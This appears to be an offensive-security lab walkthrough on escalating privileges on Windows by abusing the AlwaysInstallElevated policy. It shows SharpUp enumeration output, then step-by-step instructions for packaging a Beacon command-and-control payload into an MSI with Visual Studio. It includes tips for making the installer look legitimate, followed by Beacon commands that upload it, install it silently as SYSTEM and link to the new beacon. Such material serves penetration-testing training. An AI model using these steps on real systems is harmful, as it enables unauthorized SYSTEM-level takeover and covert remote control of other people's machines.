This policy allows standard users to install applications that require access to directories and registry keys that they may not usually have permission to change. This is equivalent to granting full administrative rights and even though Microsoft strongly discourages its use, it can still be found.
```shell
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Debug\SharpUp.exe

=== AlwaysInstallElevated Registry Keys ===

  HKLM:    1
  HKCU:    1
```

To exploit this, we need to package a payload into an MSI installer that will be installed and executed with SYSTEM privileges.

-   Generate a new Windows EXE TCP payload and save it to **C:\Payloads\beacon-tcp.exe**.
-   Open **Visual Studio**, select **Create a new project** and type "installer" into the search box. Select the **Setup Wizard** project and click **Next**.
-   Give the project a name, like **BeaconInstaller**, use **C:\Payloads** for the location, select **place solution and project in the same directory**, and click **Create**.
-   Keep clicking **Next** until you get to step 3 of 4 (choose files to include). Click **Add** and select the Beacon payload you just generated. Then click **Finish**.
-   Highlight the **BeaconInstaller** project in the **Solution Explorer** and in the **Properties**, change **TargetPlatform** from **x86** to **x64**.

>When this MSI is eventually installed, it will appear as an installed program on the target.  There are other properties you can change, such as the **Author** and **Manufacturer** which can make the installed app look more legitimate.

-   Right-click the project and select **View > Custom Actions**.
-   Right-click **Install** and select **Add Custom Action**.
-   Double-click on **Application Folder**, select your **beacon-tcp.exe** file and click **OK**. This will ensure that the beacon payload is executed as soon as the installer is run.
-   Under the **Custom Action Properties**, change **Run64Bit** to **True**.

Now build the project, which should produce an MSI at `C:\Payloads\BeaconInstaller\Debug\BeaconInstaller.msi`.
```shell
beacon> cd C:\Temp
beacon> upload C:\Payloads\BeaconInstaller\Debug\BeaconInstaller.msi
beacon> run msiexec /i BeaconInstaller.msi /q /n
beacon> connect localhost 4444
[+] established link to child beacon: 10.10.17.231
```

To remove the MSI afterwards, you can use `msiexec /q /n /uninstall BeaconInstaller.msi` before removing the file.

